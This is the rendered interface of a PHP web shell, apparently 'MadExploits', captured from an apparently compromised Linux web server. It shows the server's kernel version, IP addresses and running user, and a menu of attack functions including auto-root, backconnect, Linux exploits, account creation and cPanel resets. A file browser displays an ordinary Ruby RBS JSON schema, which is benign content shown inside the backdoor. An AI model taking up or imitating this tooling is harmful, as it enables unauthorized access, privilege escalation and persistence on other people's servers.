Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
gems /
3.0.0 /
gems /
rbs-1.0.4 /
schema /
[ HOME SHELL ]
Name
Size
Permission
Action
annotation.json
350
B
-rw-r--r--
comment.json
492
B
-rw-r--r--
decls.json
7.98
KB
-rw-r--r--
function.json
2.03
KB
-rw-r--r--
location.json
1.01
KB
-rw-r--r--
members.json
5.91
KB
-rw-r--r--
methodType.json
879
B
-rw-r--r--
types.json
6.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : members.json
{ "$schema": "http://json-schema.org/draft-04/schema#", "definitions": { "methodDefinition": { "type": "object", "properties": { "member": { "type": "string", "enum": ["method_definition"] }, "kind": { "enum": ["instance", "singleton", "singleton_instance"] }, "types": { "type": "array", "items": { "$ref": "methodType.json" } }, "comment": { "$ref": "comment.json" }, "annotations": { "type": "array", "items": { "$ref": "annotation.json" } }, "attributes": { "type": "array", "items": { "enum": ["incompatible"] } }, "location": { "$ref": "location.json" }, "overload": { "type": "boolean" } }, "required": ["member", "kind", "types", "comment", "annotations", "location"] }, "variable": { "title": "Declaration for instance variables and class variables", "description": "`@x: Integer`, `self.@x: String`, `@@name: Symbol`, ...", "type": "object", "properties": { "member": { "enum": ["instance_variable", "class_instance_variable", "class_variable"] }, "name": { "type": "string" }, "type": { "$ref": "types.json" }, "location": { "$ref": "location.json" }, "comment": { "$ref": "comment.json" } }, "required": ["member", "name", "type", "location", "comment"] }, "include": { "title": "Include mixin", "properties": { "member": { "enum": ["include"] }, "name": { "type": "string" }, "args": { "type": "array", "items": { "$ref": "types.json" } }, "annotations": { "type": "array", "items": { "$ref": "annotation.json" } }, "comment": { "$ref": "comment.json" }, "location": { "$ref": "location.json" } }, "required": ["member", "name", "args", "annotations", "comment", "location"] }, "extend": { "title": "Extend mixin", "properties": { "member": { "enum": ["extend"] }, "name": { "type": "string" }, "args": { "type": "array", "items": { "$ref": "types.json" } }, "annotations": { "type": "array", "items": { "$ref": "annotation.json" } }, "comment": { "$ref": "comment.json" }, "location": { "$ref": "location.json" } }, "required": ["member", "name", "args", "annotations", "comment", "location"] }, "prepend": { "title": "Prepend mixin", "properties": { "member": { "enum": ["prepend"] }, "name": { "type": "string" }, "args": { "type": "array", "items": { "$ref": "types.json" } }, "annotations": { "type": "array", "items": { "$ref": "annotation.json" } }, "comment": { "$ref": "comment.json" }, "location": { "$ref": "location.json" } }, "required": ["member", "name", "args", "annotations", "comment", "location"] }, "attribute": { "title": "Attribute definitions", "description": "`attr_reader`, `attr_accessor`, `attr_writer`", "properties": { "member": { "type": "string", "enum": ["attr_reader", "attr_accessor", "attr_writer"] }, "name": { "type": "string" }, "kind": { "type": "string", "enum": ["instance", "singleton"] }, "type": { "$ref": "types.json" }, "ivar_name": { "oneOf": [ { "type": "string" }, { "type": "null" }, { "enum": [false] } ] }, "annotations": { "type": "array", "items": { "$ref": "annotation.json" } }, "comment": { "$ref": "comment.json" }, "location": { "$ref": "location.json" } }, "required": ["member", "name", "ivar_name", "type", "annotations", "kind", "comment", "location"] }, "visibility": { "title": "Visibility specifier", "description": "`public` and `private`.", "type": "object", "properties": { "member": { "type": "string", "enum": ["public", "private"] }, "location": { "$ref": "location.json" } }, "required": ["member", "location"] }, "alias": { "title": "Alias declaration", "description": "`alias to_s inspect`, `alias self.new self.allocate`, ...", "properties": { "member": { "type": "string", "enum": ["alias"] }, "new_name": { "type": "string" }, "old_name": { "type": "string" }, "kind": { "type": "string", "enum": ["instance", "singleton"] }, "annotations": { "type": "array", "items": { "$ref": "annotation.json" } }, "comment": { "$ref": "comment.json" }, "location": { "$ref": "location.json" } }, "required": ["member", "new_name", "old_name", "kind", "annotations", "comment", "location"] } } }
Close